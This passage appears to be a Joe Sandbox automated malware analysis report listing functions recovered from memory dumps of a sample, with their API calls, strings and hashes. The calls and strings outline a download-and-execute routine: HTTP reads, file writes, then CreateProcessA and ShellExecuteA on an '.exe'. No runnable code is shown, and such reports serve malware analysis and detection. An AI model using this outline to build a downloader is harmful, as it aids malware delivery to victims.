Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: HeadersHttpRequest$Concurrency::cancel_current_task
String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$text
API String ID: 2146599340-3782612381
Opcode ID: 15361f417402fd4ecc7fc6d3c75552e14ddd1825e06757481bbfd3e0326afcfa
Instruction ID: 9ba0ec624b0ce2a87a65cb7bdca14d25b7083be08071b54b776f69b68f7f070f
Opcode Fuzzy Hash: 15361f417402fd4ecc7fc6d3c75552e14ddd1825e06757481bbfd3e0326afcfa
Instruction Fuzzy Hash: 34316171E00108EBDB14DFA9DC85FEEBBB9EB48714F60812AE121771C0C778A644CBA5

Function 04B4003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04B4024D

Strings

cess, xrefs: 04B4018D
kernel32.dll, xrefs: 04B4008F, 04B40095

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: aaf139267ef4e5642fbb18c39f388347c894ce93ea4240f5c082b251081cc81f
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: EB527974A01229DFDB64CF68C984BACBBB1BF49304F1480D9E94DAB351DB30AA85DF15

Function 10001175 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264
networkcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 1000117F
InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA

Strings

text, xrefs: 10001327

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
String ID: text
API String ID: 1154000607-999008199
Opcode ID: a1e379d679c24b6df6bb2eefa12ec4263e14a704e2d288e5f5fa36855e8b81ad
Instruction ID: b002d723a568eb8b1b2c33cfea8b8604ab2d7fe63d6740fb25dc42610badb9b0
Opcode Fuzzy Hash: a1e379d679c24b6df6bb2eefa12ec4263e14a704e2d288e5f5fa36855e8b81ad
Instruction Fuzzy Hash: 62B14975900229AFEB65CF24CC85BDAB7B8FF09355F1041D9E508A7265DB70AE80CF90

Function 10001F20 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A

CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155

Strings

open, xrefs: 1000214F
.exe, xrefs: 1000206B

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: .exe$open
API String ID: 1627157292-49952409
Opcode ID: e7d307bd9b08359f9d4fa667b823f6c82abf28f5e9ce0c80c34beec9c79a4aa9
Instruction ID: 97952a91a625a221cb26b3956644a393a6e3da00256d77b8c5daa8cab0653b15
Opcode Fuzzy Hash: e7d307bd9b08359f9d4fa667b823f6c82abf28f5e9ce0c80c34beec9c79a4aa9
Instruction Fuzzy Hash: 40514B715083809BE724DF64C881EDFB7E8FB95394F004A2EF69986195DB70A944CB62

Function 00401D60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

http://, xrefs: 00401DE0

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID: http://
API String ID: 0-1121587658
Opcode ID: abedc0d90a1f4d3688eb9c4f017047df236718ab065654b8d82d4035641d8820
Instruction ID: beb1f9afae3dc46702148b7d116b1b3e2c798cd3d3ea86b197954d74152ad0ce
Opcode Fuzzy Hash: abedc0d90a1f4d3688eb9c4f017047df236718ab065654b8d82d4035641d8820
Instruction Fuzzy Hash: F451C371E002099FDB14CFA8C885BEEBBB5EF48314F20812EE915B72C1D7799945CBA4

Function 004020C0 Relevance: 4.6, APIs: 3, Instructions: 53
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 004020F6
WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402117
CloseHandle.KERNEL32(00000000), ref: 0040211E

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 8b77efdb325a00ac37aead48d1dd076f0e9ed27c116024a8a8daefa345587264
Instruction ID: 54406537bc71ee86772d4e0f102f4040d02d69394e2def86726d8d124470bd26
Opcode Fuzzy Hash: 8b77efdb325a00ac37aead48d1dd076f0e9ed27c116024a8a8daefa345587264
Instruction Fuzzy Hash: 4401D671610204ABD720DF68DD49FEEB7A8EB48725F00053EFA45AA2D0DAB46945C758

Function 04D60B63 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 274
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ZXP`, xrefs: 04D60B0B

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID: ZXP`
API String ID: 0-273839070
Opcode ID: b23eb522130fb85386a5aa1fdc1cca7a2ffdfe72795acd4e42edc59c6dd9ade0
Instruction ID: 026f53c795884eefa3e90510beda7cd4c5976fef111db13c62132d39f7d77870
Opcode Fuzzy Hash: b23eb522130fb85386a5aa1fdc1cca7a2ffdfe72795acd4e42edc59c6dd9ade0
Instruction Fuzzy Hash: 185180EB24C120BE7143C4462B64EFB6BAEE5C6730331C827F487D1906F2946A4E6531

Function 04D60B00 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 270
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ZXP`, xrefs: 04D60B0B

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID: ZXP`
API String ID: 0-273839070
Opcode ID: a9e14c8551db06b9280bf5aa80713d8d6b897944caca961d55ae4165484ebfc3
Instruction ID: 4087da48cf534d93d6318f60236c21410a6219cea630d2f35ec01f4676d60d02
Opcode Fuzzy Hash: a9e14c8551db06b9280bf5aa80713d8d6b897944caca961d55ae4165484ebfc3
Instruction Fuzzy Hash: FF516FEB24C120BE7143C5866B64EFB67AEE1C67303318926F887D2906F2946A4A6531

Function 04B40E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,04B40223,?,?), ref: 04B40E19
SetErrorMode.KERNEL32(00000000,?,?,04B40223,?,?), ref: 04B40E1E

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: f91484002589e88e4a4d3f6ea8ab43fed4857b487d85ba7f5556b63228273427
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 0BD0123154512877D7003A94DC09BCD7B1CDF09B62F008451FB0DD9080C770964046E6

Function 04D60991 Relevance: 1.9, APIs: 1, Instructions: 368COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a8d6de48fcb2686920242624297b391681f0b87d2e79aaed8bc8ab3062d127
Instruction ID: 00ab0a44181462a8c3e54bcbd94c63009ffdb86a1b6cfa9e9cce71e51c903832
Opcode Fuzzy Hash: b4a8d6de48fcb2686920242624297b391681f0b87d2e79aaed8bc8ab3062d127
Instruction Fuzzy Hash: CE614DEB34C120BE7143C5862B64EFB67AEE1C67703318427F887D1906F294AA4E7531

Function 04D6099D Relevance: 1.9, APIs: 1, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c714ed78d31632d76dc07f53cca6ee41a2fda8654021184f188b476cf54adeee
Instruction ID: a911e99f5dd2d789fe47f797241974fabc7eb3f89e5d9e220d61f8f8aa55e6b4
Opcode Fuzzy Hash: c714ed78d31632d76dc07f53cca6ee41a2fda8654021184f188b476cf54adeee
Instruction Fuzzy Hash: E6612BEB34C120BE7143C5862B64EFB6BAEE1C67303318527F887D5906F294AE4E6531

Function 04D609BC Relevance: 1.8, APIs: 1, Instructions: 346COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e8a9b3d1f113a6ab4b10b11b11bb37dc768df50f9380ae57503b2ef14668578
Instruction ID: 283929a66fc4ee2528719657a0d2d26c1b4d24f4e8055f4c510fae0e2fb92428
Opcode Fuzzy Hash: 7e8a9b3d1f113a6ab4b10b11b11bb37dc768df50f9380ae57503b2ef14668578
Instruction Fuzzy Hash: 7D613DEB34C120BE7143C5866B64EFB6BAEE1C67303318527F887D5906F294AA4E7531

Function 04D60A3D Relevance: 1.8, APIs: 1, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba9e6d469475bc178d90239d46f66f6edc832174860b6ce5f05382d469bde7a7
Instruction ID: 5c98d23022d87933cc2c248a50f87a65bb0e88e5ea267af55c6cfeb09bb673e9
Opcode Fuzzy Hash: ba9e6d469475bc178d90239d46f66f6edc832174860b6ce5f05382d469bde7a7
Instruction Fuzzy Hash: 00618FEB34D120BEB103C5466B64EFB6BAEE6C67307318827F487D1906F294AE496531

Function 04D609D5 Relevance: 1.8, APIs: 1, Instructions: 339COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2ee2ff2b8146e5140b4a76f5701c3fd4be180f7694af86181b085a5373aee6c
Instruction ID: 901e6196bdb84a2f911a0815494147ed2f5204f441812ae5dd4020b16e7ed9f1
Opcode Fuzzy Hash: e2ee2ff2b8146e5140b4a76f5701c3fd4be180f7694af86181b085a5373aee6c
Instruction Fuzzy Hash: 056181EB34C110BEB103C5466B64EFB6BAEE6C67303318827F487D2906F394AE496531

Function 04D60A00 Relevance: 1.8, APIs: 1, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e54f03550708d2a89d0c37f34ec421019d3b10a9eaa6e7e1da239c974533882e
Instruction ID: fd50ab9545b49455d9ac17190635701b3df42df7ade2195a5499039e635010f1
Opcode Fuzzy Hash: e54f03550708d2a89d0c37f34ec421019d3b10a9eaa6e7e1da239c974533882e
Instruction Fuzzy Hash: 14514DEB34C120BEB143C5866B64EFB67AEE1C67303318427F887D5906F294AE4A7531

Function 04D60A13 Relevance: 1.8, APIs: 1, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03d674aa5263bddee48947d41e19be1c967a5ecbb218db099ff076e99edac9fb
Instruction ID: 3d0cafb0c309e236cc33a2904b810467474a23661de44fd5a66e94e6677e1372
Opcode Fuzzy Hash: 03d674aa5263bddee48947d41e19be1c967a5ecbb218db099ff076e99edac9fb
Instruction Fuzzy Hash: DD514EEB34C120BE7143C5866B64EFB67AEE1C67303318426F887D5906F294AA4E6531

Function 04D60A67 Relevance: 1.8, APIs: 1, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17c474ee59ad7346eaad1c02ce21670bdff3cecd69edc7d9cb90fd3d667efd5f
Instruction ID: f2151fade97fb834194a0b5b46f9bc631e7a12fbfdd6ee608005bef35eea7544
Opcode Fuzzy Hash: 17c474ee59ad7346eaad1c02ce21670bdff3cecd69edc7d9cb90fd3d667efd5f
Instruction Fuzzy Hash: D8515EEB34C120BE7143C5466B64EFB67AEE1C6730331882BF887D5906F294AE4A6531

Function 04D60A2B Relevance: 1.8, APIs: 1, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39cc06c39116b6409738cee37f42008d0b985a5b04dd5f4d4bf889ad6e08829f
Instruction ID: 96f0056feb4955ef03f2496ed37bb8f48f53fd9b3238d943db96832afa9aa8ae
Opcode Fuzzy Hash: 39cc06c39116b6409738cee37f42008d0b985a5b04dd5f4d4bf889ad6e08829f
Instruction Fuzzy Hash: 09514EEB34C120BE7143C5466B64EFB67AEE1C6730331C82BF887D5906F294AE4A6571

Function 04D60A54 Relevance: 1.8, APIs: 1, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b9d9af3a019430ab0497906814526497bea525db94e2ede2d0b0278c08c88c4
Instruction ID: a13c548770124a9b6b75fd67cedac9a78a4cb5c43bab6dff4ea50f9cd9ddbaae
Opcode Fuzzy Hash: 4b9d9af3a019430ab0497906814526497bea525db94e2ede2d0b0278c08c88c4
Instruction Fuzzy Hash: 95513EEB34C120BEB143C5466B64EFB67AEE1C6730731C827F887D5906F294AE4A6531

Function 04D60A78 Relevance: 1.8, APIs: 1, Instructions: 308COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a8f75cb053c8618ad86a30a463d62163fa2e8843e6b6a30e5dc40247790bf8f
Instruction ID: 650159f57af5e82c170177d69764dd6b41c6b805f907ac9fe223f93bb85c0178
Opcode Fuzzy Hash: 2a8f75cb053c8618ad86a30a463d62163fa2e8843e6b6a30e5dc40247790bf8f
Instruction Fuzzy Hash: 6B517EEB34C120BE7103C5866B64EFB67AEE1C67303318827F887D5906F295AE4A6531

Function 04D60AB7 Relevance: 1.8, APIs: 1, Instructions: 299COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3145e8268e59947baaf50fe5d560bdecb56a28c2b187941cc2a2c3af68d6ed81
Instruction ID: 945fa49645ce1cf80fac477905f2bc9a23375f27e99fe5f31917318d99bdf9b8
Opcode Fuzzy Hash: 3145e8268e59947baaf50fe5d560bdecb56a28c2b187941cc2a2c3af68d6ed81
Instruction Fuzzy Hash: 975180EB34C121BE7103C5462B64EFB67AEE1C67303318827F887D2906F394AA4E6431

Function 04D60A9E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bae64ef8e76cca5378e06cb250bbc82d4c4503bb0fc971c4d595e0f1b06c260
Instruction ID: b12c248c920382c709e0dabc14a21964fe87c6304952ce7b849637104b49f614
Opcode Fuzzy Hash: 4bae64ef8e76cca5378e06cb250bbc82d4c4503bb0fc971c4d595e0f1b06c260
Instruction Fuzzy Hash: C0516DEB34C121BE7143C5462B64EFB67AEE1C6730331882AF887D1906F394AA4A6531

Function 04D60ACC Relevance: 1.8, APIs: 1, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e271d3a38492d8b9e95d8bdcc9b808cd9137995db07b4f4427a5f5a5a53fdf7
Instruction ID: af6a795c64745296d1f460b113603734d20ce0a1e71f67f48079b534f012ea2b
Opcode Fuzzy Hash: 7e271d3a38492d8b9e95d8bdcc9b808cd9137995db07b4f4427a5f5a5a53fdf7
Instruction Fuzzy Hash: FC5160EB248120BE7143C54A6B64EFB67AEE1C6734331C82BF887D1906F3946E4A7531

Function 04D60B17 Relevance: 1.8, APIs: 1, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 857218b1164f0dfa00c84f382ab2df24a39d838485f9096c7991f60487a3eaa4
Instruction ID: 942511f5b13067b758b97aa7c7b73036f743b652a4a0f29a18f617ba173e3a23
Opcode Fuzzy Hash: 857218b1164f0dfa00c84f382ab2df24a39d838485f9096c7991f60487a3eaa4
Instruction Fuzzy Hash: 3351DFEB24C220BF7103C1856B54EFB6BAEE5C6734331846BF887D5902F3946E4A6531

Function 04D60B7E Relevance: 1.7, APIs: 1, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a41d2cd1dbf6d5001ca92e6fc7b6e22d1dc73df678a308cef17db1d131bf0e6d
Instruction ID: 05f20550bda327958967b06e99d8dbba1e79b998876a3cc90c913c94e4940550
Opcode Fuzzy Hash: a41d2cd1dbf6d5001ca92e6fc7b6e22d1dc73df678a308cef17db1d131bf0e6d
Instruction Fuzzy Hash: 22415EEB34C1207EB103C1466B64EFB67AEE1C6730331892AF887D1906F394AE4E6531

Function 04D60B9A Relevance: 1.7, APIs: 1, Instructions: 233COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D60DC1

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 6cf1892c114dbb9dbdaae7a7838e0809adce695626afb24a1400374f2536f519
Instruction ID: a21f49ea08cefa5a016752ea11efb183e4ddc58398abaecd3b73a443aa2e4fa9
Opcode Fuzzy Hash: 6cf1892c114dbb9dbdaae7a7838e0809adce695626afb24a1400374f2536f519
Instruction Fuzzy Hash: 24411EEB24C2207EB143C1462B64EFB676EE5C6730331892AF847D1906F395AE4E7531

Function 04D60BCE Relevance: 1.7, APIs: 1, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69dc487b9a73b592c1908e8f8b7a13926511be8c2e687f0df0c6c4cf7fda28d1
Instruction ID: 56910345364116f64d42528c3de6263f4ebd174eb62492b99e0b7b0d13250d0f
Opcode Fuzzy Hash: 69dc487b9a73b592c1908e8f8b7a13926511be8c2e687f0df0c6c4cf7fda28d1
Instruction Fuzzy Hash: D041A1FB24C2607FB203C1922B64AFB67ADE5C2730731846AF847D6903F2956E4E6531

Function 04D60C3B Relevance: 1.7, APIs: 1, Instructions: 191COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D60DC1

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: ec42795e5586143b923f0d0b0ea9735bfafef79abd9b5010ec01f7894b129b84
Instruction ID: 5590680dd5c1388cc35055e2863ec909e88208237d65ac2533ab170b7422f254
Opcode Fuzzy Hash: ec42795e5586143b923f0d0b0ea9735bfafef79abd9b5010ec01f7894b129b84
Instruction Fuzzy Hash: 7F416FFB20C251BEB203C5556F24EFB6B6DD6C2730331896BF887D2906E3946A4D6531

Function 04D60C0F Relevance: 1.7, APIs: 1, Instructions: 189COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D60DC1

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 07cfaad0c9d9629c218b2e3b166df4a3288c5571627b9d501ab511211c5551f2
Instruction ID: f27f1fc4e7d9550abb8d904bbeae086263ed9d0a68cbaf64863cd16432b23232
Opcode Fuzzy Hash: 07cfaad0c9d9629c218b2e3b166df4a3288c5571627b9d501ab511211c5551f2
Instruction Fuzzy Hash: 653150EB3481217EB103C1426B54EFB676DD5C57303318926F887D1906F395AE4E7531

Function 04D60C27 Relevance: 1.7, APIs: 1, Instructions: 186COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D60DC1

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: b8d9a048f3696f1427f00c4141340faa01f88e639f278a7abfe44bf2edc16e50
Instruction ID: 1e4dcdd2131aa0e784092b579bbd6ca61a07dd4f18aa3e72f61d7a7655fd68ab
Opcode Fuzzy Hash: b8d9a048f3696f1427f00c4141340faa01f88e639f278a7abfe44bf2edc16e50
Instruction Fuzzy Hash: 7C313CFB348221BEB103C1826B54EFB676EE5C5730331882AF887D1906F394AE4E6531

Function 04D60CB4 Relevance: 1.7, APIs: 1, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91eb43e12114d9dee11ac08b98db0cd89e8d661c2d7155a752ddd3f8b4bae7c6
Instruction ID: 612072e734e2b07f7e89280ac656802f98bdfff9092245bbb2b0f54ef9e2397b
Opcode Fuzzy Hash: 91eb43e12114d9dee11ac08b98db0cd89e8d661c2d7155a752ddd3f8b4bae7c6
Instruction Fuzzy Hash: DC311AEB248121BEB103C1426F24EFB676DE6C5730731892BF947D5906F398AE4E6931

Function 04D60CD3 Relevance: 1.6, APIs: 1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

